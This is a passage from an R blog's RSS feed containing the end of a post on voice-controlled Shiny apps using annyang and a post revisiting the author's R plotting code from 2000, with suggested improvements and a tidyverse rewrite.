&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We could now use this in a similar way to other shiny input functions.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;voiceInput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;text&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;out&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;shinyApp&lt;/span&gt;(ui, server)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;a href="https://jumpingrivers.shinyapps.io/speech3/" rel="external"&gt;Test it&lt;/a&gt; with &lt;strong&gt;Jarvis&lt;/strong&gt; followed by some other speech.&lt;/p&gt;
&lt;p&gt;Multiple voice inputs with different keywords are also fine. Personally, I think this particular design pattern is a bit of a pain since it requires stating a keyword then processing text in R. But as a single R function that allows voice capture with flexibility in what we do with the output I think it’s OK and the plus side is outside of this function definition we don’t need any Javascript.&lt;/p&gt;
&lt;h2 id="how-well-does-it-actually-work-in-practice"&gt;How well does it actually work in practice&lt;/h2&gt;
&lt;p&gt;I have found that performance across all devices and browsers is definitely not equal. By far the best browser I have found for viewing the apps is Google Chrome. I have also tended to find that my Ubuntu machines don’t do as well as Microsoft machines in picking up words correctly. A chat I had with someone recently suggested this might be down to drivers under Ubuntu for the microphones but that is not my area of expertise. Voice recognition was also fine on both of my Blackberry phones (one running BB OS 10, the other running Android 7).&lt;/p&gt;
&lt;p&gt;It is worth noting that this does require an internet connection to function, in Chrome the voice to text is performed in the cloud.&lt;/p&gt;
&lt;p&gt;The other thing I have noticed is that annyang seems relatively sensitive to background noise. This isn’t so bad for functions called using specific phrases but does sometimes have a large effect on the multi-word splats. This is because the splats are greedy and the background noise makes the recognition engine think that you are still talking long after you finished which gives the appearance of the application hanging.&lt;/p&gt;
&lt;h2 id="the-grand-plan"&gt;The grand plan&lt;/h2&gt;
&lt;p&gt;I have been playing around with annyang quite a lot and have started making an R package to make it more accessible to other R users. It’s currently on a private GitHub repo, but I will finish up soon and do a first public release there with an associated blog post. For now please feel free to borrow the above R function definition.&lt;/p&gt;
&lt;p&gt;I do think there is a lot of scope for the wider utility of voice-controlled applications. They do a phenomenal job of making certain aspects of the digital world more accessible to those that don’t consider themselves tech-savvy. I have been toying around with Alexa skills too, although primarily in Python and am yet to discover whether there can be a pure R solution to getting Alexa to do things. But perhaps that’s for another post.&lt;/p&gt;
&lt;h4 id="image-credit"&gt;Image Credit:&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;The very neat image of the &lt;a href="https://www.flickr.com/photos/156466858@N02/31265224167/" rel="external"&gt;microphone&lt;/a&gt; is due to &lt;a href="https://musicoomph.com/best-blue-yeti-accessories/" rel="external"&gt;Gavin Whitner&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/voice-control-your-shiny-apps/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R from the turn of the century</title><link>https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/</link><pubDate>Thu, 20 Sep 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-from-the-turn-of-the-century/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Last week I spent some time reminiscing about my PhD and looking through some old R code. This trip down memory lane led to some of my old R scripts that amazingly still run. My R scripts were fairly simple and just created a few graphs. However now that I’ve been programming in R for a while, with hindsight (and also things have changed), my original R code could be improved.&lt;/p&gt;
&lt;p&gt;I wrote this code around April 2000. To put this into perspective,&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;R mailing list was started in 1997&lt;/li&gt;
&lt;li&gt;R version 1.0 was released in Feb 29, 2000&lt;/li&gt;
&lt;li&gt;The initial release of Git was in 2005&lt;/li&gt;
&lt;li&gt;Twitter started in 2006&lt;/li&gt;
&lt;li&gt;StackOverflow was launched in 2008&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Basically, sharing code and getting help was much more tricky than today - so cut me some slack!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-r-from-the-turn-of-the-century"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-original-code"&gt;The Original Code&lt;/h2&gt;
&lt;p&gt;My original code was fairly simple - a collection of &lt;code&gt;scan()&lt;/code&gt; commands with some &lt;code&gt;plot()&lt;/code&gt; and &lt;code&gt;lines()&lt;/code&gt; function calls.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Bad code, don&amp;#39;t copy!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Seriously, don&amp;#39;t copy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;par&lt;/span&gt;(cex&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time10.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;c&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;l&amp;#39;&lt;/span&gt;,xlab&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Counts&amp;#34;&lt;/span&gt;,ylim&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;0.08&lt;/span&gt;),ylab&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Probability&amp;#34;&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time15.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time20.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time25.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;a&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scan&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/time30.out&amp;#34;&lt;/span&gt;,&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;lines&lt;/span&gt;(c,a&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;x,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abline&lt;/span&gt;(h&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;legend&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;90&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;0.08&lt;/span&gt;,lty&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),lwd&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2.5&lt;/span&gt;,col&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=10&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=15&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=20&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=25&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;t=30&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The resulting graph ended up in my thesis and a black and white version in a resulting &lt;a href="http://www.mas.ncl.ac.uk/~ncsg3/content/papers/renshaw2008.pdf" rel="external"&gt;paper&lt;/a&gt;. Notice that it took over eight years to get published! A combination of focusing on my thesis, very long review times (over a year) and that we sent the paper via snail mail to journals.&lt;/p&gt;
&lt;img class="image-center" src="setup-1.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="how-i-should-have-written-the-code"&gt;How I should have written the code&lt;/h2&gt;
&lt;p&gt;Within the code, there are a number of obvious improvements that could be made.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;In 2000, it appears that I didn’t really see the need for formatting code. A few spaces around assignment arrows would be nice.&lt;/li&gt;
&lt;li&gt;I could have been cleverer with my &lt;code&gt;par()&lt;/code&gt; settings. See our recent &lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;blog post&lt;/a&gt; on styling base graphics.&lt;/li&gt;
&lt;li&gt;My file extensions for the data sets weren’t great. For some reason, I used &lt;code&gt;.out&lt;/code&gt; instead of &lt;code&gt;.csv&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;I used &lt;code&gt;scan()&lt;/code&gt; to read in the data. It would be much nicer using &lt;code&gt;read.csv()&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;My variable names could be more informative, for example, avoiding &lt;code&gt;c&lt;/code&gt; and &lt;code&gt;a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Generating some of the vectors could be more succinct. For example&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep.int&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# instead of&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# instead of&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Overall, other than my use of &lt;code&gt;scan()&lt;/code&gt;, the actual code would be remarkably similar.&lt;/p&gt;
&lt;h2 id="a-tidyverse-version"&gt;A tidyverse version&lt;/h2&gt;
&lt;p&gt;An interesting experiment is how the code structure differs using the {tidyverse}. The first step is to load the necessary packages&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;fs&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Overkill here&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;purrr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Fancy for loops&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Reading in csv files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Manipulation of data frames&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Plotting&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The actual tidyverse inspired code consists of three main section&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Read the data into a single data frame/tibble using &lt;code&gt;purrr::map_df()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Cleaning up the data frame using &lt;code&gt;mutate()&lt;/code&gt; and &lt;code&gt;rename()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Plotting the data using {ggplot2}&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The amount of code is similar in length&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;dir_ls&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;data&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# list files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_df&lt;/span&gt;(read_csv, .id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;filename&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; col_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# read &amp;amp; combine files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Time &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rep&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;120&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Create Time column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;rename&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Counts&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;X1&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Rename column&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Time, Counts)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; filename)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Nicer theme&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_viridis_d&lt;/span&gt;(labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;t = &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Change colours&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and gives a similar (but nicer) looking graph.&lt;/p&gt;
&lt;img class="image-center" src="blog-2018-oldr-unnamed-chunk-5-1.png" style="width:500px; class:image-center"&gt;
&lt;h2 id="i-lied-about-my-code-working"&gt;I lied about my code working&lt;/h2&gt;
&lt;p&gt;Everyone who uses R knows that there are two assignment operators: &lt;code&gt;&amp;lt;-&lt;/code&gt; and &lt;code&gt;=&lt;/code&gt;. These operators are (more or less, but not quite) equivalent. However, when R was first created, there was another assignment operator, the underscore &lt;code&gt;_&lt;/code&gt;. My original code actually used the &lt;code&gt;_&lt;/code&gt; as the assignment operator, i.e.&lt;/p&gt;
